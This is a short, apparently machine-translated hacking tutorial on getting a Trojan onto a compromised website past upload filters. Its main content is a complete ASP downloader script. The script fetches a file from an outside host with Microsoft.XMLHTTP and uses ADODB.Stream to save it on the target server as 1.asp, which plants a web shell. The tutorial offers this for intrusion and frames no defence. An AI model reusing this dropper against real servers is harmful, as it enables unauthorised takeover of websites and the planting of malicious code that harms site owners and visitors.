Purreth
In the process of website intrusion, sometimes when submitting our Trojan or other ASP files, it will be intercepted by the first-class information monitoring system, because it sets a limit on submission characters, since it does not allow us to submit, we can use the download method. this is like when we upload a large EXE file, the website prohibits upload, but we can use external download to download the target file to the local server. well, this method is that as long as the server does not disable the XML and data stream components, we can submit the following ASP script file to the server.
<%
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http://www.hacksb.cn/1.txt", False
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile Server. MapPath ("1.asp"), 2
Set sGet = nothing
Set sPOST = nothing
%>